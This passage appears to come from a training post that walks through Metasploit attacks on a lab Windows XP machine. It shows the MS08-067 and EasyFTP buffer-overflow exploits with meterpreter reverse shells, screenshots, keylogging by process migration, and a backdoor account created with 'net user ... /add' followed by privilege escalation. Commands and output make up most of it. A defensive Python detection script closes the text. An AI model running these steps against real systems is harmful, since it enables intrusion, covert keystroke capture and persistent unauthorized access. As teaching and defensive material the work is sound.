   LPORT     8080             yes       The listen port



Exploit target:


   Id  Name

   --  ----

   47  Windows XP SP3 Korean (NX)



msf exploit(ms08_067_netapi) > unset PAYLOAD

Unsetting PAYLOAD...


msf exploit(ms08_067_netapi) > show payloads


Compatible Payloads

===================


   Name                                                Disclosure Date  Rank    Description

   ----                                                ---------------  ----    -----------

   generic/custom                                                       normal  Custom Payload


~ output omitted ~


   windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager

   windows/meterpreter/reverse_tcp_dns         



msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp 

payload => windows/meterpreter/reverse_tcp


msf exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.10.135   yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)

   LHOST     192.168.10.134   yes       The listen address

   LPORT     8080             yes       The listen port



Exploit target:


   Id  Name

   --  ----

   47  Windows XP SP3 Korean (NX)



msf exploit(ms08_067_netapi) > exploit 


[*] Started reverse handler on 192.168.10.134:8080 

[*] Attempting to trigger the vulnerability...

[*] Sending stage (885806 bytes) to 192.168.10.135

[*] Meterpreter session 2 opened (192.168.10.134:8080 -> 192.168.10.135:1082) at 2016-01-24 15:49:27 +0900


meterpreter > shell

Process 2488 created.

Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>


C:\WINDOWS\system32>ipconfig


Windows IP Configuration


Ethernet adapter ���� ���� ����:


        Connection-specific DNS Suffix  . : localdomain

        IP Address. . . . . . . . . . . . : 192.168.10.135

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 192.168.10.2


C:\WINDOWS\system32>

C:\WINDOWS\system32>^Z (ctrl+z)

Background channel 1? [y/N]  y

[-] Error running command shell: ThreadError can't be called from trap context


meterpreter >




Ex4) Checking target system information and processes

meterpreter > sysinfo       show target system information
meterpreter > ps            list the processes running on the target system




Ex5) Screenshot of the target system's screen

meterpreter > screenshot    take a screenshot of the target's screen
Screenshot saved to: /root/prTcNwSY.jpeg

 - Open the screenshot in root's home directory from the GUI to view it




Ex6) Keylogging the target system

 - Open Notepad on Win XP

meterpreter > ps             find the PID of Notepad on Win XP

 2944  notepad.exe        x86   0        WITH-15B28B4CFD\admin                 C:\WINDOWS\system32\notepad.exe

meterpreter > migrate 2944   migrate into the Notepad process (for keylogging)
[*] Migrating from 1072 to 2944...
[*] Migration completed successfully.

meterpreter > run post/windows/capture/keylog_recorder

 - Type text into Notepad on Win XP


안녕하세요 타겟입니다.


Hello Hi



meterpreter > run post/windows/capture/keylog_recorder


[*] Executing module against WITH-15B28B4CFD

[*] Starting the keystroke sniffer...

[*] Keystrokes being saved in to /root/.msf4/loot/20160124163330_default_192.168.10.135_host.windows.key_308141.txt

[*] Recording keystrokes...


(ctrl+c)


^C[*] Saving last few keystrokes...

[*] Interrupt 

[*] Stopping keystroke sniffer...

meterpreter > 



root@kali:~# ls -la /root/.msf4/loot

합계 12

drwxr-xr-x 2 root root 4096  1월 24 16:33 .

drwxr-xr-x 8 root root 4096  1월 24 10:01 ..

-rw-r--r-- 1 root root  193  1월 24 16:33 20160124163330_default_192.168.10.135_host.windows.key_308141.txt



root@kali:~# cat /root/.msf4/loot/20160124163330_default_192.168.10.135_host.windows.key_308141.txt

Keystroke log started at 2016-01-24 16:33:30 +0900

dkssu <Back>  <Back>  <Back>  <Back>  <Back> 

ssudpdy rptt <Back> dlqsl <Return>  <Return> 

ello <Back>  <Back>  <Back>  <Back>  <Back> Ho H 




Ex6) Forcibly terminating a program on the target system


meterpreter > kill 2944


meterpreter > quit

[*] Shutting down Meterpreter...


[*] 192.168.10.135 - Meterpreter session 3 closed.  Reason: User exit

msf exploit(ms08_067_netapi) > 

msf exploit(ms08_067_netapi) > back

msf > 



Ex7) Attack exploiting an FTP application vulnerability I

 - Run easyFTP on Win XP

msf > search easyftp

Matching Modules
================

   Name                                     Disclosure Date  Rank   Description
   ----                                     ---------------  ----   -----------
   exploit/windows/ftp/easyftp_cwd_fixret   2010-02-16       great  EasyFTP Server CWD Command Stack Buffer Overflow
   exploit/windows/ftp/easyftp_list_fixret  2010-07-05       great  EasyFTP Server LIST Command Stack Buffer Overflow
   exploit/windows/ftp/easyftp_mkd_fixret   2010-04-04       great  EasyFTP Server MKD Command Stack Buffer Overflow
   exploit/windows/http/easyftp_list        2010-02-18       great  EasyFTP Server list.html path Stack Buffer Overflow


msf > use windows/ftp/easyftp_list_fixret

msf exploit(easyftp_list_fixret) > show options

Module options (exploit/windows/ftp/easyftp_list_fixret):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST                         yes       The target address
   RPORT    21                   yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 - Version 2002


msf exploit(easyftp_list_fixret) > show payloads

Compatible Payloads
===================

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   generic/custom                                                       normal  Custom Payload
   generic/debug_trap

~ (middle of the list omitted) ~

   windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns


msf exploit(easyftp_list_fixret) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP SP3 - Version 2002


msf exploit(easyftp_list_fixret) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(easyftp_list_fixret) > set RHOST 192.168.10.135
RHOST => 192.168.10.135

msf exploit(easyftp_list_fixret) > set LHOST 192.168.10.134
LHOST => 192.168.10.134

msf exploit(easyftp_list_fixret) > set TARGET 0
TARGET => 0

msf exploit(easyftp_list_fixret) > show options

Module options (exploit/windows/ftp/easyftp_list_fixret):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    192.168.10.135       yes       The target address
   RPORT    21                   yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.10.134   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:
   Id  Name
   --  ----
   0   Windows XP SP3 - Version 2002


msf exploit(easyftp_list_fixret) > exploit 

[*] Started reverse handler on 192.168.10.134:4444 
[*] Prepending fixRet...
[*] Adding the payload...
[*] Overwriting part of the payload with target address...
[*] Sending exploit buffer...

msf exploit(easyftp_list_fixret) > back
msf > 

 - The attack did not succeed
 - Checking Win XP, the FTP service has stopped (reason: the exploit module's target version does not match the version of the target's FTP server)



Ex8) Attack exploiting an FTP application vulnerability II

 - Run easyFTP on Win XP and check its version (1.7.0.11)
 
msf > search easyftp

Matching Modules
================

   Name                                     Disclosure Date  Rank   Description
   ----                                     ---------------  ----   -----------
   exploit/windows/ftp/easyftp_cwd_fixret   2010-02-16       great  EasyFTP Server CWD Command Stack Buffer Overflow
   exploit/windows/ftp/easyftp_list_fixret  2010-07-05       great  EasyFTP Server LIST Command Stack Buffer Overflow
   exploit/windows/ftp/easyftp_mkd_fixret   2010-04-04       great  EasyFTP Server MKD Command Stack Buffer Overflow
   exploit/windows/http/easyftp_list        2010-02-18       great  EasyFTP Server list.html path Stack Buffer Overflow


msf > use windows/ftp/easyftp_cwd_fixret
msf exploit(easyftp_cwd_fixret) > show options

Module options (exploit/windows/ftp/easyftp_cwd_fixret):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST                         yes       The target address
   RPORT    21                   yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal - v1.7.0.2


msf exploit(easyftp_cwd_fixret) > show payloads

Compatible Payloads
===================

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   generic/custom                                                       normal  Custom Payload

~ (middle of the list omitted) ~

   windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns



msf exploit(easyftp_cwd_fixret) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal - v1.7.0.2
   1   Windows Universal - v1.7.0.3
   2   Windows Universal - v1.7.0.4
   3   Windows Universal - v1.7.0.5
   4   Windows Universal - v1.7.0.6
   5   Windows Universal - v1.7.0.7
   6   Windows Universal - v1.7.0.8
   7   Windows Universal - v1.7.0.9
   8   Windows Universal - v1.7.0.10
   9   Windows Universal - v1.7.0.11


msf exploit(easyftp_cwd_fixret) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(easyftp_cwd_fixret) >  set RHOST 192.168.10.135
RHOST => 192.168.10.135

msf exploit(easyftp_cwd_fixret) > set LHOST 192.168.10.134
LHOST => 192.168.10.134

msf exploit(easyftp_cwd_fixret) > set target 9
target => 9

msf exploit(easyftp_cwd_fixret) > show options

Module options (exploit/windows/ftp/easyftp_cwd_fixret):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    192.168.10.135       yes       The target address
   RPORT    21                   yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.10.134   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   9   Windows Universal - v1.7.0.11


msf exploit(easyftp_cwd_fixret) > exploit 

[*] Started reverse handler on 192.168.10.134:4444 
[*] Prepending fixRet...
[*] Adding the payload...
[*] Overwriting part of the payload with target address...
[*] Sending exploit buffer...
[*] Sending stage (885806 bytes) to 192.168.10.135
[*] Meterpreter session 4 opened (192.168.10.134:4444 -> 192.168.10.135:1093) at 2016-01-24 1

meterpreter > 

 - Check the FTP server's status on Win XP



Ex9) Creating a backdoor account and elevating privileges

meterpreter > shell
Process 2484 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
C:\WINDOWS\system32>net user test test1234 /add
net user test test1234 /add


C:\WINDOWS\system32>exit
exit

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 - The test/test1234 account can later be used to log in to Win XP over SSH and other services.

meterpreter > 
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.10.135 - Meterpreter session 4 closed.  Reason: User exit

msf exploit(easyftp_cwd_fixret) > quit
root@kali:~# 
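Ex9 leaves two traces a defender can key on: a command shell spawned by a network service process (the FTP server hosting the exploited listener), and an account created from that shell, which Windows records as Security event 4720. As an added detection example, not part of the original post, this correlates Sysmon process-creation records with 4720 records; the events are constructed, flattened to dicts, and the EasyFTP binary path is a hypothetical placeholder.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not from the page's lab). Fields are flattened from
# Sysmon process-creation (EventID 1) and Windows Security "user account created"
# (EventID 4720) records; the FTP server path is a hypothetical placeholder.
EVENTS = [
    {"time": "2016-01-24T16:39:50", "src": "sysmon", "id": 1, "image": r"C:\WINDOWS\explorer.exe",
     "parent": r"C:\WINDOWS\system32\userinit.exe", "cmdline": "explorer.exe"},
    {"time": "2016-01-24T16:40:01", "src": "sysmon", "id": 1, "image": r"C:\WINDOWS\system32\cmd.exe",
     "parent": r"C:\EasyFTP\ftpserver.exe", "cmdline": "cmd.exe"},
    {"time": "2016-01-24T16:40:07", "src": "sysmon", "id": 1, "image": r"C:\WINDOWS\system32\net.exe",
     "parent": r"C:\WINDOWS\system32\cmd.exe", "cmdline": "net user test test1234 /add"},
    {"time": "2016-01-24T16:40:07", "src": "security", "id": 4720, "account": "test"},
    {"time": "2016-01-24T16:55:00", "src": "security", "id": 4720, "account": "svc_backup"},
]

# Parent images that should never spawn an interactive shell (assumption: any
# process whose name contains one of these fragments is a network service).
SERVICE_PARENT_HINTS = ("ftp", "httpd")
SHELLS = ("cmd.exe", "powershell.exe")
NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\b", re.I)

def find_suspicious(events, window=timedelta(minutes=5)):
    """Return (rule, detail) findings from chronologically ordered events."""
    findings, pending_adds = [], {}   # pending_adds: account -> time of "net user /add"
    for ev in events:
        t = datetime.fromisoformat(ev["time"])
        if ev["src"] == "sysmon" and ev["id"] == 1:
            image, parent = ev["image"].lower(), ev["parent"].lower()
            if image.endswith(SHELLS) and any(h in parent for h in SERVICE_PARENT_HINTS):
                findings.append(("shell_from_service", ev["parent"]))
            m = NET_USER_ADD.search(ev["cmdline"])
            if m:
                pending_adds[m.group(1).lower()] = t
        elif ev["src"] == "security" and ev["id"] == 4720:
            acct = ev["account"]
            t0 = pending_adds.get(acct.lower())
            # account creation that follows a shell-driven "net user /add" within the window
            if t0 is not None and timedelta(0) <= t - t0 <= window:
                findings.append(("account_added_via_shell", acct))
    return findings

if __name__ == "__main__":
    for rule, detail in find_suspicious(EVENTS):
        print(rule, detail)
```

The svc_backup creation is not flagged because no shell-driven `net user /add` preceded it; on a real host the same logic would run over the exported event log rather than an inline list.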


Posted by: training inquiries 010-9902-9710 (instructor 김정우)

